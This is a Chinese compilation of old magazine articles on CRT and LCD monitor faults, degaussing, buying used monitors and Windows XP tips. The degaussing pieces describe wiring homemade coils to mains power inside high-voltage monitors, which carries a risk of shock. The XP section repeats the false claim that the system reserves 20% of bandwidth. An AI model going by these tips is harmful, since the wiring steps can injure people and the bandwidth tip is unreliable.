    这是一个很有效的方法，特别是对于一些热稳定性差和一些发热较严重的元器件用此法比较有效。当发现某个元器件温升异常时，可用纯酒精蘸在棉花球上敷于该元器件的表面让其迅速冷却。其原理和硬件超频中的水冷降温法相同。待冷却后再开机，如发现刚才的故障明显减轻或消失，则可初步判断该元器件已热失效或已有问题，可将其更换之。而加温法则是和冷却法相辅相成的，当发现元器件热稳定性差时，用冷却法无效的情况下，我们就可用烙铁或电吹风等对被怀疑的元器件进行适当的加热处理，然后再开机观察，如发现刚才不明显的故障加重了，那我们就可对该元器件进行重点检查，甚至将其更换。
    8.干扰法
    在业余条件下，用干扰法进行检修也是一种较常见的方法。其方法是：用螺丝刀等物去接触该电路的输入端，输入人体感应信号或碰撞时产生的物理性杂波。用来检查视频、中频等电路，然后可根据显示屏上的杂波反应，基本上可以断定电路工作是否正常。其检查顺序应从后级向前级，检查到哪级无杂波反应哪级就有问题，就可对其进行重点检测。
    9.换件法
    换件法是实用和快捷的检修方法。当你对哪个元器件拿不准时，就可先将其更换掉，换上好的元器件，如果故障消除，就证明原来的元器件有问题。特别是对于一些不便测量的元器件更应如此。如高压包（内部绕组短路），高压硅堆（其内部绝缘不好，整流特性差等）以及一些电容电阻等。
    编者注：显示器内有高压电源，请菜鸟们谨慎行事，注意安全，最好在专业维修人员的指导下进行维修。


显示器信号线问题

《一键清理系统垃圾》

显示器信号线问题

    显示器是电脑器材中设备比较昂贵的东西，占到电脑整机价格的1/5以上。而显示器维修的价格通常也比较贵，一般人也难以掌握，通常出问题常把用户搞的焦头烂额。

    笔者的朋友有一台杂牌的显示器，购买时由于缺乏电脑方面的常识，只听经销商的推荐。显示器症状是开机后时常颜色偏黄，有时正常有时不正常。而显示器已经过保修期了。我对这东西也是一知半解，没敢帮他维修。打电话给经销商，让他上门给检查一下。可经销商上门要收取50元上门费，不管是否可以维修！

    没办法，只能找家附近的电脑维修公司来修理，他们的态度还比较好，免费上门检查。上门后看症状说高压包可能有问题，一会又说其他地方出问题，要带回去检查。我问他们，如果出最严重的问题，维修需要多少？技术员狮子大开口的说要200元，一般问题100元。目前电脑维修行当真是赚钱啊。

    求人不如求己，我自己开始分析问题，把与显示有关的东西全部检查了一篇，给显卡清理灰尘，金手指用橡皮擦干净，但是问题依旧。
我在开机的状态下，到机箱后面动了动显示器信号线的接口，看看是否插紧，在检查这个部分的时候，发觉显示器的线比较凌乱，而且有一团都被折了起来，索性整理一下吧，我在整理的时候朋友忽然叫了起来，说显示正常了。

    我松了一口气，看来小小的信号线也会造成显示器显示不正常，将线整理后，使用到现在没有发生任何问题。所以说有时候不起眼的小问题也会造成比较严重的后果，但是出现问题后我们应该先自己仔细地检查，说不定能查出问题的所在呢。


显示器信号线引起的黑屏故障

《一键清理系统垃圾》

显示器信号线引起的黑屏故障

   近日为朋友新买了一台二手电脑，具体配置为赛扬433MHz CPU、i810主板、64MB内存和10.2GB硬盘，由于机箱不是二手的，所以乍一看和新的也没什么区别。在经销商处对所有硬件进行了测试，没有问题。安装好操作系统，交待了朋友如何连接显示器、鼠标、键盘线等傻瓜问题后，各自打道回府。
   没想到到家还没坐稳，朋友就打电话过来，原来他的“爱机”到家后竟然不听使唤，面对的是“黑脸”一张。黑屏？这故障应该难不倒我吧？不过是CPU、内存、显卡之类的硬件接触不良或是损坏。而这块主板是i810的，集成了显卡和声卡，不会是因为声、显卡接触不良出现这样的故障。难道是刚才在路上将内存或是CPU颠松了不成？打开机箱，将CPU和内存重新拔下来，并用毛刷和橡皮将内存的金手指和插槽清理干净，然后再将CPU和内存装回去。通电试机，结果问题依旧。内存和CPU又检测不出错误，其他硬件又是全新的，按道理讲不应该这么快就出现故障吧。肯定是某个地方存在着接触不良或是短路。因此，我决定重点检查一下与显示器有关的电路。首先从显卡查起，由于是集成显卡，因此很少会出现接触不良的故障，再检查显卡上的视频模拟接口，未发现异常。虽说显示器很少损坏，还是再看看吧。没想到，就是这不起眼的显示器，竟然能够引发黑屏的故障。一般显示器的信号输出采用的是15针接口的数据线。而在这台显示器的D型信号输出端竟然少了一插针，再仔细看看，原来不是断了根针，而是这根插针被顶了回去，这样显示器和显卡得不到充分接触而产生上述故障。
   究其原因，可能是朋友以前没使用过电脑，认为电脑都是高精密仪器，费了好大的劲将电脑机箱后的数据线，信号线一一插牢。由于位置不对，且用力过大，所以将显示器插头上的插针顶了回去。找到了故障原因后，排除起来就容易多了。取一个尖嘴钳或是镊子将这根被顶回去的插针拔出来，注意这次不能再用力过大，以免将插针折断。将插针拔出后，小心地将信号线插入机箱后的显卡接口上，拧好固定螺丝，以免松动。将所有连线连好后通电试机，结果一切正常，又出现了熟悉的蓝天白云。
   通过这一故障的检修，也提醒我们在拆装电脑时一定要小心轻放，不能用力过猛，以免造成不必要的损失。


显示器信号线引起的黑屏故障

《一键清理系统垃圾》

显示器信号线引起的黑屏故障

《中国电脑教育报》钟元翔

    近日为朋友新买了一台二手电脑，具体配置为赛扬433MHz CPU、i810主板、64MB内存和10.2GB硬盘，由于机箱不是二手的，所以乍一看和新的也没什么区别。在经销商处对所有硬件进行了测试，没有问题。安装好操作系统，交待了朋友如何连接显示器、鼠标、键盘线等傻瓜问题后，各自打道回府。

    没想到到家还没坐稳，朋友就打电话过来，原来他的“爱机”到家后竟然不听使唤，面对的是“黑脸”一张。黑屏？这故障应该难不倒我吧？不过是CPU、内存、显卡之类的硬件接触不良或是损坏。而这块主板是i810的，集成了显卡和声卡，不会是因为声、显卡接触不良出现这样的故障。难道是刚才在路上将内存或是CPU颠松了不成？打开机箱，将CPU和内存重新拔下来，并用毛刷和橡皮将内存的金手指和插槽清理干净，然后再将CPU和内存装回去。通电试机，结果问题依旧。内存和CPU又检测不出错误，其他硬件又是全新的，按道理讲不应该这么快就出现故障吧。肯定是某个地方存在着接触不良或是短路。因此，我决定重点检查一下与显示器有关的电路。首先从显卡查起，由于是集成显卡，因此很少会出现接触不良的故障，再检查显卡上的视频模拟接口，未发现异常。虽说显示器很少损坏，还是再看看吧。没想到，就是这不起眼的显示器，竟然能够引发黑屏的故障。一般显示器的信号输出采用的是15针接口的数据线。而在这台显示器的D型信号输出端竟然少了一插针，再仔细看看，原来不是断了根针，而是这根插针被顶了回去，这样显示器和显卡得不到充分接触而产生上述故障。

    究其原因，可能是朋友以前没使用过电脑，认为电脑都是高精密仪器，费了好大的劲将电脑机箱后的数据线，信号线一一插牢。由于位置不对，且用力过大，所以将显示器插头上的插针顶了回去。找到了故障原因后，排除起来就容易多了。取一个尖嘴钳或是镊子将这根被顶回去的插针拔出来，注意这次不能再用力过大，以免将插针折断。将插针拔出后，小心地将信号线插入机箱后的显卡接口上，拧好固定螺丝，以免松动。将所有连线连好后通电试机，结果一切正常，又出现了熟悉的蓝天白云。

    通过这一故障的检修，也提醒我们在拆装电脑时一定要小心轻放，不能用力过猛，以免造成不必要的损失。


显示器严重磁化后的恢复

《一键清理系统垃圾》

显示器严重磁化后的恢复

    由于一次失误，我的显示器被磁化了。事情发生在一天晚上，在忙完一些事情之后，随手无意将主机电源插在了一个改造过的直流插座上，一开机只见屏幕上出现大红大绿的颜色，活似一张“大花脸”，吓得我赶紧关了机器。惊魂未定，马上开始查找原因，拆机器、换显卡都没有用，我又仔细检查了电脑桌的里里外外，没有发现任何有磁性的东西，一阵折腾之后，实在是没法子了，只好坐下来仔细想想原因。排除了主机的问题，从故障现象看，好像是由于显示器被磁化产生的现象，但是磁场在哪里呢?正在百思不得其解时，一眼盯中了那个插座。那个插座是我改造过的半波整流插座，上面有一个开关，在里面装了一个整流二极管，输出的电压是经过半波整流的直流电压，而现在这个开关是打开的!喔，天哪!我赶紧拔下了插头，没想到半波整流后，主机和显示器仍能工作，我终于明白显示器是怎么被磁化的了。
    原因出在显示器内部的消磁线圈，消磁线圈是绕在显像管屏幕四周的几匝线圈，它的作用是在开机的一瞬间，直接利用降压后的50Hz的交流电，在线圈上产生逐渐减弱的交变磁场来对显示器进行消磁。而市电经过我的插座后被半波整流，也就是说加在消磁线圈上的不是一个交变的电压，而是一个断续的近乎直流的电压，那么在消磁线圈上产生的磁场也不是交变的，而是断续的不改变方向的磁场，而显示器就被这个“消磁线圈”所磁化了。
    现在问题是找到了，但是怎么让显示器恢复正常呢?由于磁化得较严重，所以利用显示器本身来消磁是不可能的了。要是有“彩电消磁器”就好了，对着屏幕按几下就恢复了。可是手头没有，对着这个“大花脸”我真是哭笑不得，终于一条“妙计”被我想到了。既然是消磁线圈磁化了显示器，那么也就可用它来恢复显示器。之所以显示器本身不能恢复，是因为显示器的消磁线圈是在开机的一瞬间工作，它消磁的时间不够，既然这样，那就人为地延长这个时间，开始吧!
    马上找到并拔出消磁线圈的接头待用，然后在一个变压器的次级交流输出（12V输出）接头上接两根导线，再接到消磁线圈的接头上，为显示器找个好插座插上，打开，把亮度和对比度调到最大，出现光栅后，插上变压器，屏幕上立即出现了五颜六色的闪光点，马上拔出变压器，颜色似乎减少了点，插上，又拔下……这样反复十多次，终于使显示器基本恢复了原样，虽然还有一点点的偏色，但已不妨碍显示了。我想可能是我的变压器的输出电压过低才这么麻烦，而且不能完全恢复，如果有大点的就好了。
    使用了近一个月，现在这台1996年购买的显示器似乎又恢复了青春，磁化偏色的现象已经基本上消失了，连以前右下角的一小片粉红色也近乎淡化了，看来这手工消磁的效果还是蛮好的。想来现在仍有不少的人在使用老显示器，也或多或少的有一定的磁化偏色的现象，希望我这偶得的消磁方法能给大家一点帮助，不过没有一点电工或电子方面知识的朋友还是不要动手为好，如果触了电或是烧了机器就不好了。


选购二手显示器经验谈

《一键清理系统垃圾》

选购二手显示器经验谈

《中国电脑教育报》微笑男孩

    二手彩显是最具有淘金价值的，但问题也是最大。下面就介绍一些我长期在二手彩显市场“搏杀”总结出的经验。 需要说明的是，买二手货要承担一定的风险，并且容易出现各种问题。所以，选购二手显示器最重要一点是谨慎，宁可不捡便宜也要看清楚后再买。淘金者本来就是穷人，万一中了圈套，更是得不偿失。

    挑选一台好的二手显示器要注意以下几点：

    看外壳的颜色

    外壳的颜色发黄说明这台彩显已经用很长时间了，内部零件多已老化，最好不要购买。近几年的产品外壳大多数为乳白色。其次还要看看外壳是否有被砂纸打磨过的痕迹，某些老板为了卖高价就用砂纸把发黄的显示器外壳翻新，好滥竽充数。

    检查显示器的外壳是否有破损

    有的裂痕用胶水粘起来了，不易被发现，所以要仔细检查，尤其是散热孔附近更要留意。如果裂痕并不严重，还可以以此为砍价的理由，但如有大裂痕的显示器则最好不要购买，因为显示器内部的零件很可能已经损坏了。

    看一看显示器的铭牌

    铭牌贴在彩显机壳的后面，上面印有显示器的生产日期、型号、电压、性能、产地……但有的奸商会把铭牌撕掉或把日期之类靠肉眼能判断出来好坏的数值刮掉以欺骗用户。

    检查显示器外壳的固定螺丝和接缝

    固定螺丝如果有被拧过的痕迹或机壳接缝处有伤的话，说明这台显示器一定出过问题，要是机器特别新(只有一两年)且螺丝帽已经残破不堪，十有八九是这台显示器多次出过故障(属于残次品)，所以机主才把它卖掉，因此最好不要购买这类的显示器。

    当场打开后盖，查看内部情况

    首先要看零件是否齐全，如屏蔽罩等。接着看电路板是否太老，有没有维修痕迹，显像管上有没有显像管厂家的标签，标签上的生产日期和铭牌贴上的是否相一致。这些小节问题往往可以看出显示器的具体情况（如螺丝未被拧动，则可考虑略过此步骤）。

    听一听显示器工作时的声音是否正常

    显示器正常工作时应该是没有声音的，如果你听到声音就不要购买。但某些中高档显示器开机时会有“咔”的一声，不要担心，那是继电器在工作，属于正常状态。

    亲自试用

    带上自己的显卡和显卡驱动程序，之所以要带上自己的显卡，是因为不同的显卡在不同的显示器上显示效果不同。然后再看一下这台显示器是否能达到你的要求，如：1280×1024 85Hz等分辨率下的表现。

    检查焦距

    方法是打开一个文本文件，再把字调到最小或把分辨率调到最高并且开满屏。再看一看字是否清楚，如果不清楚可以让老板调一下，或个要求更换一台再试。

    检查单色状态

    把桌面调成纯色(绿色最好)看一下颜色是否一致，如果有其它颜色的话，说明这台显示器被磁化了，较轻微的磁化现象可以用显示器上自带的消磁选项消除，严重的话最好还是放弃。

    对比度和亮度调节测试

    把显示器的对比度和亮度调到最高，找几张色彩丰富的图片看看显示效果是否满意，如色彩及饱和度等等。

    长时间待机检查

    测试的时间要长一点，建议不少于40分钟。因为有的显示器内部老化，刚开机时看不出毛病，过一段时间机器预热之后，问题才会显现。

    检查功能按钮

    试一试显示器的OSD按钮是否能用好用，还有消磁时应能听到“咔”的一声并看到画面抖动。

    显像管坏点

    要特别注意坏点和显示器烧伤，坏点是指显示器上不能发光的点，这种点如果太多（超过三个），坚决不要购买。烧伤是指因长时间开显示器且画面固定不变，荧光粉被电子束烧伤，无法完全恢复，便形成一块色斑。屏幕保护程序就是为保护荧光粉不被烧伤而制作的。

    索要质保

    发挥口舌之功，尽可能向商家索要1个月以上的质量保证和3天以上无条件免费退换的“保退单”，如果短期内出现问题解决起来就很容易。

    以上是本人悟出购买二手显示器的几个要点，愿大家买到一款称心如意的二手显示器。当然，这其中还有更多的选购窍门，也希望大家集思广益，交流经验。


阴极射线管显示器（CRT）磁化的原理及解决方法

《一键清理系统垃圾》

阴极射线管显示器（CRT）磁化的原理及解决方法

    显示器是几乎每台电脑都必须具备的设备，我们一打开电脑便会目不转睛地注视着显示器。如果没有显示器，我们就不能及时了解电脑的工作状况。所以，显示器在整套电脑中的位置就如我们的眼睛，是展现电脑灵魂的窗户。
    显示器按其工作原理分许多类型，比较常见的是：阴极射线管显示器（CRT）和液晶显示器（LCD）。此外还有：等离子体显示器（PDP）、真空荧光显示器（VFD）等。离子体显示器（PDP）、真空荧光显示器（VFD）是新的显示技术的代表，但是由于技术尚未成熟而没有投入量产，在市场上几乎不可能见到。液晶显示器（LCD）比之传统的CRT显示器，有着图像不失真、无闪烁、无辐射等优点，但是其缺点亦不少，如价格昂贵、亮度低、视角窄、响应速度慢等。综合看来，阴极射线管显示器（CRT）仍是目前最适合普通用户购买的产品。
    虽然阴极射线管显示器的综合性能和价格不错，但是它仍有一些与生具来的缺点，如体积庞大、重量大、耗电量大、辐射较强、容易受磁化等。这些缺点是由阴极射线管显示器的工作原理造成的，不可能从根本上予以改变，只能进行后续的修补改进或在问题发生后再另行解决，磁化现象就是一个很好的例子。
    普通的家庭用户和商业用户在使用电脑的环境里，总免不了有其它的用电设备和通讯设备。当这些设备在工作时，就会成为一个电磁源，在周围形成一个磁场并向外辐射电磁波，形成磁场的大小和辐射的强度由这些设备的功率决定。事实上，当用户在使用电脑时，身边中常有数个以上的用电设备和通讯设备在工作，在电脑旁边形成了很多的电磁辐射源，它们不断地发射电磁波干扰显示器的正常工作。显示器厂商们为了解决这一问题，在显示器的塑料外壳内加装了一层金属屏蔽罩，希望以此来杜绝电磁干扰。但是由于显示器在工作时的发热量很大，所以金属屏蔽罩必须留出一定的空隙以供散热。这样一来，电磁干扰仍可以通过这些空隙进入显示器内部，金属屏蔽罩只能起到减少干扰的作用，而无法彻底解决电磁干扰问题。值得一提的是，不少生产厂家在设计生产低端显示器的时候，为了降低成本，干脆取消了金属屏蔽罩，这样就使干扰问题更加严重。不幸的是使用这些没有金属屏蔽罩的低端显示器的用户，在总的消费者中所占的比例很大。
    如此看来，阴极射线管显示器磁化问题是普遍存在的。阴极射线管显示器遭磁化后，显示的图像会发生扭曲、晃动，画面无法正常显示。在这种情况下，就必须对显示器进行消磁。
    要对显示器进行消磁，必须先了解显示器显示的原理。我们知道阴极射线管显示器其发光原理是：当显象管内部的电子枪阴极发出的电子束，经强度控制、聚焦和加速后变成细小的电子流，再经过Deflection Coil（偏转线圈）的作用向正确目标偏离，穿越荫罩的小孔或栅栏，轰击到荧光屏上的荧光粉。这时荧光粉被激活，就发出光线来。R、G、B三色荧光点被按不同比例强度的电子流点亮，就会产生各种色彩。其中和磁化显示器有关的是Deflection Coil（偏转线圈）。它用于电子枪发射器的定位，通电后能够产生一个强磁场，通过改变磁场强度来移动电子枪。这样一来，在显示器旁边的电磁干扰源就会对偏转线圈的磁场产生影响，会改变它的强度和方向。由于偏转线圈的磁场强度和方向被扰乱，电子枪发射器的定位就会发生偏移，从而使射出的电子流偏离原来的轨道，轻则使画面产生色斑，重则造成画面的错乱。
    由于阴极射线管显示器磁化问题严重，一些显示器生产厂商已经在产品中增加了消磁功能，一般在显示器的主菜单（MAIN MENU）中的DEGAUSS选项即是。执行DEGAUSS之后，显示器画面会开始剧烈晃动，并伴随很大的电流声。大约在数秒钟后，晃动和电流声同时停止，消磁完毕。显示器自带的消磁功能对一般的暂时性磁化有较好的作用，使用也较为方便，但是对强磁场干扰后造成的强度磁化则作用不大。
    对于受较强电磁干扰磁化的显示器，最好使用专门的消磁设备来完成，例如消磁棒和消磁线圈。
    消磁棒是针对显示器磁化问题而生产的一种短棒状的设备，在一般的电子市场都有销售。使用时持其在显示器屏幕前，以屏幕中心为圆心，做半径逐渐放大的圆周运动，直至消磁完毕。如一次的效果不明显可多做几次。消磁棒的优点是购买和使用都很方便，一般的消费者都能正确操作。
    消磁线圈消是应用磁感应原理：通过线圈中的交变电流在线圈的几何中心产生一个交变的磁场，使用该交变磁场对处于几何中心的显示器的阴极进行消磁，从而达到消磁的目的。使用消磁线圈进行消磁时，手持线圈，贴着屏幕从某一个边缘开始向中心缓缓作圆周运动，到达屏幕中心后再反过来往外圈旋转，如此反复多次。结束操作是，将线圈置于屏幕中心，并使其与屏幕表面成90度角，保持垂直地慢慢后退到显示器1m以外，然后关闭电源，重新开机，仔细观察消磁效果。如效果不佳，可反复进行，直至完全消除显示器因磁化造成的不正常现象。消磁线圈的优点是效果较为显而易见（个人认为），缺点是操作过程没有消磁棒来得简单。
    消磁线圈还有一大好处就是制作简单，一般的电脑玩家都能亲自动手做一个，只要注意好细节，所做出来的消磁线圈的效果还是很不错的。自己制作消磁线圈，既能节省维修开支，并且通过亲自动手操作，又能使操作者获得DIY的乐趣和成就感，何乐而不为呢？
    自制消磁线圈需准备的材料是：几米漆包线、一个的圆形塑料框、绝缘电胶布、绝缘棒（一米）等。制作方法是将漆包线（胶质导线或塑料绝缘导线）平行绕在圆形塑料框上，同时注意缠绕的匝数不能太少，否则所产生的磁场过小，没有实际效果；匝数也不能太多，否则产生的磁场过于强大，反对周围的用电设备而不利。实际操作中只要绕完所准备的几米漆包线即可，不可过多或过少。缠绕完毕后，将绝缘电胶布环绕粘贴于圆形塑料框上，可粘贴两到三层（至少粘贴两层，且须将圆形塑料框和漆包线的表面全部粘贴好），使塑料框和漆包线固定在一起。接下来，将绝缘棒的一端置于已固定好的圆形塑料框的一边，用绝缘电胶布粘贴固定。最后，将漆包线的线头串联在大负载的家用电器上（如电炉、取暖器或电饭煲）或用废旧显示器上拆下的消磁线圈专用电阻。将消磁线圈串联在大负载电器上或专用电阻上，是为了降低消磁线圈在使用中的电流强度以减少发热量。否则，当消磁线圈使用时，其发热量极大，极易烧穿漆包线的绝缘层，从而造成短路。但是，降低了电路中的电流，会使消磁线圈的磁场强度下降，消磁的效果就会不明显，解决的办法是增加缠绕漆包线的匝数。在增加漆包线的匝数同时，应注意到以上所提到的匝数对磁场大小的影响。
    使用时，将大负载电器接入市电，在消磁线圈中的电流就会使消磁线圈旁边产生磁场。用户手持绝缘棒没有和消磁线圈连接的一端，对显示器进行消磁。具体的操作方法在上文已经有提到。

    现在让我们来总结一下制作和使用消磁线圈的注意事项：
一、消磁线圈的大小应与所使用的CRT显示器相匹配；
二、绝缘电胶布胶带层数至少需两层，以确保绝缘效果；
三、在权衡消磁线圈的发热量和所需磁场强度后，确定消磁线圈的安匝数（A.T值）；
四、如有条件的，可在消磁线圈电路中串联一个热敏电阻，这样消磁线圈在工作时，会根据工作温度自动调整电流值，确保使用安全。热敏电阻的温限和阻值应根据所制的消磁线圈的漆包线长度和电路中所串联的大负载电器来确定；
五、使用过程中应避免损伤绝缘层，确保消磁线圈的安全；
六、使用过程中应当使用绝缘棒，最好不要用手接触消磁线圈；
只要注意以上几点，作出一个消磁性能良好且使用安全的消磁线圈并不困难。


正确设置液晶显示器的分辨率

《一键清理系统垃圾》

正确设置液晶显示器的分辨率

    故障现象：朋友近日新装了一台计算机，配置了某著名品牌的15英寸LCD，使用状况一直良好。前两天突然出现故障，即显示画面的效果大打折扣，字体模糊不清。

    故障解决：这样的故障乍一看似乎很严重，其实有经验的朋友一看便知道，这是由于错误设置了LCD的分辨率造成的。查看“显示属性”，朋友果然将分辨率设置成了800×600。将其分辨率改为1024×768，故障消失。

    原理分析：LCD和CRT显示器的显示原理不同，其分辨率是不能随意设置的。CRT显示器对于所支持的分辨率有较大的弹性，而LCD只有在真实分辨率下才能表现出最佳效果。当将其分辨率设置成真实分辨率以外的值时，则可能出现两种情况：一是扩大或缩小屏幕的显示范围，二是显示效果大打折扣。本例所遇到的就是第二种情况。当然第一种情况也较多见，例如将真实分辨率为1280×1024的LCD设置成1024×768，则屏幕上只有1024×768部分的区域有显示，显示效果保持不变，但超出部分则出现黑屏。

    经验总结：在设置LCD的分辨率时，一定要先查清其真实分辨的值再设置，只有这样才能得到最佳的显示效果。


主板变形导致显卡故障

《一键清理系统垃圾》

返回总目录 上一页 目录页

主板变形导致显卡故障

《中国电脑教育报》杜学珍

    近日，机房有一台电脑突然不能启动。启动现象为：电脑在自检过程中出现“一长三短”鸣叫。很明显，这是显卡的故障（主板是Award BIOS）。打开机箱，将显卡重新压实。启动电脑，故障依旧。难道是显卡坏了？取下显卡插到别的电脑上，计算机正常启动。又将另一正常显卡插到本机上，现象重现。

    主板出了问题？我用放大镜仔细观察主板的AGP插槽，没有发现异样。为检查是否是接触不料，我将显卡反复拔插多次，分别用不同的力度，使显卡整体和两侧以不同深度插入插槽。当试验到将显卡有接口一端向上微翘的时候，随着一声清脆的短鸣，可爱的蓝天白云终于出现在我面前。后又试验将显卡重新按实，电脑又不能启动。

    找到原因，于是我在安装显卡的时候，在挡板的垫片下垫上约1.5毫米厚的硬纸，上紧螺丝，电脑正常使用。后归纳原因如下：因机房电脑数量成倍扩充，为节约开支，计算机桌子由一个机位改造成两个机位。改造后的机位不能将立式机箱竖放，只得委屈一下将它们平置。但这个平面的一侧有一高2厘米的挡板，使计算机摆放成一个倾斜角度，长期下来，主板发生形变，致使显卡与插槽不能很好接触。看来计算机的摆放并非无足轻重，如果摆放不当，使主板发生形变，会产生各种各样的故障。


显示故障

《一键清理系统垃圾》

返回总目录

显示故障

◎CRT常见故障问答
◎不拆机也可以维修CRT显示器
◎菜鸟修显示器一例
◎常见彩色显示器故障维修
◎超频引起显卡损坏一例
◎电脑综合诊治之显卡故障详解
◎电视/捕捉二合一卡特殊故障
◎二手显示器维修“三板斧”
◎方正显示器屏幕抖动和亮度不足故障的检修
◎废弃显卡还魂记
◎更改显示器刷新频率的代价
◎更换显存修显卡
◎检修显示器花屏故障
◎揭开显示器闪烁之谜
◎解决AGP显卡与AMD CPU冲突一法
◎解决显示器花屏问题
◎解决显示器雪花故障
◎巧修长城彩显无光故障
◎如何令显示器长命百岁
◎电脑显示器的相关设置与常见故障排除方法
◎三星500MP显示器故障维修实例
◎升级您的电视卡
◎我被“电视卡”撞了一下腰
◎显卡
◎显卡及显示器故障处理技巧
◎显卡刷新频率随你改
◎显示器15针接头受潮导致黑屏
◎显示器OSD菜单的几种特殊故障及处理方法
◎显示器
◎显示器常见故障解决方法
◎显示器常见故障认识误区及处理(二)
◎显示器常见故障认识误区及处理(一)
◎显示器出现光栅之谜
◎显示器的常见故障
◎显示器电源雷击故障的检修
◎显示器黑屏故障分析
◎显示器黑屏故障排除
◎显示器模糊的原因与处理
◎显示器起死回生有术
◎显示器术语(二)
◎显示器术语(一)
◎显示器维护之DIY
◎显示器维修常识
◎显示器维修两例
◎显示器维修入门全攻略（二）
◎显示器维修入门全攻略（三）
◎显示器维修入门全攻略(一）
◎显示器维修之维修入门篇
◎显示器信号线问题
◎显示器信号线引起的黑屏故障
◎显示器信号线引起的黑屏故障
◎显示器严重磁化后的恢复
◎选购二手显示器经验谈
◎一例由“猫”引起的显卡故障
◎阴极射线管显示器（CRT）磁化的原理及解决方法
◎由ADSL电源引发的显示器故障
◎在Linux下安装显卡驱动程序
◎正确设置液晶显示器的分辨率
◎主板变形导致显卡故障

www.163164.com 下载:《一键清理系统垃圾》程序，保持系统的“苗条”身材与运行速度！

返回总目录


【Windows】攻略大全

《一键清理系统垃圾》

返回总目录 目录页 下一页

【Windows】攻略大全

Alt键使用十二招
1、激活*作命令：按下Alt键可以激活活动窗口的菜单栏，使菜单栏的第一个菜单成为高亮条，而按下Alt键和一个字母就可以激活这个字母所代表的菜单项，如按下Alt＋F就可以激活当前窗口的“文件（File）”菜单。此外，在对话框中，同时按下Alt键和带下划线的字母则可以选定该选项并执行相应的操作。
    2、终止某一进程：按下Ctrl＋Alt＋Del组合键即可弹出一个“关闭程序”对话框，选取某一进程，然后点击“结束任务”即可快速终止该进程。而再次按下Ctrl＋Alt＋Del组合键则可重新启动计算机。
    3、 弹出下拉列表：在对话框中，可以通过Alt＋向下箭头键来弹出所选的下拉列表，以免去移动鼠标寻找并点击列表框下箭头按钮之苦。
    4、快速查看属性：按下Alt＋Enter组合键或在按住Alt键的同时鼠标左键双击某对象（如资源管理器右边窗口中的文件夹、文件、桌面上的图标等，左边窗口中的文件夹不行），则可快速打开其“属性”对话框。其作用相当于点鼠标右键，并选取“属性”。
    5、切换DOS窗口：按下Alt＋Enter组合键可以在窗口和全屏幕方式下切换 MS－DOS。
    6、 万能抓图热键：在运行游戏或其它应用软件中，当屏幕上出现精美的画面时按下Alt＋PrintScreen组合键，就可以把当前活动窗口或对话框的内容拷贝至剪贴板，然后调用“画笔”或其它绘图程序，选取“编辑”菜单中的“粘贴”项，即可调出一幅漂亮的画面来。
    7、关闭应用程序：按下Alt＋F4键可以最快的方式关闭任何应用程序，而不用在文件菜单或工具条中寻找并单击“退出”或“关闭”。
    8、切换应用程序：按住Alt键不放，再连续按下Tab键则可以在一个对话框中显示出当前已经运行的所有程序的图标和当前激活的程序的图标及其名称，只要释放Alt键便可以立刻切换到该应用程序中，称之为“冷切换”。
    9、打开控制选单：在应用程序中，按下Alt＋空格键可以直接打开系统控制选单。
    10、 撤消上步操作：在Windows 98的各个对话框中，凡是对编辑框的*作都可以通过Alt＋Backspace键来撤消，其效果和Ctrl＋Z完全一样。该功能同样适用于微软的各字处理软件，如记事本、书写器、WORD等。另外，也可用该组合键来撤消文件移动或重命名等文件*作。
    11、切换辅助选项：对需要使用辅助选项快捷键的特定用户来说，Alt键同样可以助一臂之力。比如，按下左Alt＋左Shift＋Print Sscreen键可切换高对比度开关；按下左Alt ＋左Shift ＋ Num Lock 键可切换鼠标键开关。
    12、在Word中：选择文本时，如果先按下Alt键再拖动鼠标，则为列选择方式（否则为行选择方式）；在拖动标尺或表格线时，无法看出其准确的数据，但如果先按下Alt键再拖动或点击，则可获得精确的数据。

全面提速Windows XP

Windows XP现在已经相当普及了，在使用它的过程中，你是否感觉在速度上很多地方还没有Windows 9x系统快呢？比如访问网上邻居、开机关机等，下面我们就来逐个提升它们的速度。

    1、加速网上邻居

    在Windows XP中访问网上邻居是相当恼人的，系统会搜索自己的共享目录和可作为网络共享的打印机以及计划任务中和网络相关的计划任务，然后才显示出来，显然这样速度就会比Windows 9x中慢很多。其实这些功能我们并没有使用上，与其不用还不如删除它们，这样速度就会明显加快。打开注册表编辑器，找到 HKEY_LOCAL_MACHINE/sofeware/Microsoft/Windows/ Current Version/Explore/RemoteComputer/NameSpace，删除其下的{2227A280-3AEA-1069-A2DE08002B30309D}（打印机）和{D6277990-4C6A-11CF8D87- 00AA0060F5BF}（计划任务），重新启动电脑，再次访问网上邻居，你会发现快了很多。

    2、减少开机滚动条时间

    每次启动Windows XP，蓝色的滚动条都要走上好多次，其实这里我们也可以把它的滚动时间减少，以加快启动速度。打开注册表编辑器，找到HKEY_LOCAL_MACHINESYSTEM\CurrentControlSet\Control\Session Manager\Memory ManagementPrefetchParameters，在右边找到EnablePrefetcher主键，把它的默认值3改为1，这样滚动条滚动的时间就会减少。

    3、加快开机速度

    在XP中关机时，系统会发送消息到运行程序和远程服务器，告诉它们系统要关闭，并等待接到回应后系统才开始关机。加快开机速度，可以先设置自动结束任务，首先找到HKEY_CURRENT_USER\Control Panel\Desktop，把AutoEndTasks的键值设置为1；然后在该分支下有个“HungAppTimeout”，把它的值改为“4000（或更少），默认为50000；最后再找到HKEY_LOCAL_MACHINE\ System\CurrentControlSetControl\，同样把WaitToKillServiceTimeout设置为“4000”；通过这样设置关机速度明显快了不少。

    4、去掉菜单延迟

    为了达到视觉上的真实感，Windows XP中的菜单在打开时会有滑出的效果，但这也会延缓打开速度。我们可以在HKEY_CURRENT_USER\Control Panel\Desktop下找到“MenuShowDelay”主键，把它的值改为“0”就可以去掉菜单延迟效果。

    5、提高宽带速度

    专业版的Windows XP默认保留了20%的带宽，其实这对于我们个人用户来说是没有什么作用的。尤其让它闲着还不如充分地利用起来。

    在“开始→运行”中输入gpedit.msc，打开组策略编辑器。找到“计算机配置→管理模板→网络→QoS数据包调度程序”，选择右边的“限制可保留带宽”，选择“属性”打开限制可保留带宽属性对话框，选择“禁用”即可。这样就释放了保留的带宽，对于上网的朋友是非常有用的。

XP中的一些小东西

1.免费的系统教程（system32文件夹下）
    安装完Windows XP后很想马上学习并体验一下它的魅力吗？我们无需再东奔西走去找烦人的文字教材。只要选择“开始”→“漫游Windows XP”，就会出现界面，它将引导我们游历Windows XP的新功能。
    小提示：Windows XP中自带的教程非常形象，是图形界面的，而且制作得相当精美，微软的权威性可想而知。如果你的“开始”菜单上没有“漫游Windows XP”项目，则可以运行C:＼Windows＼System32＼tourstart.exe进入。

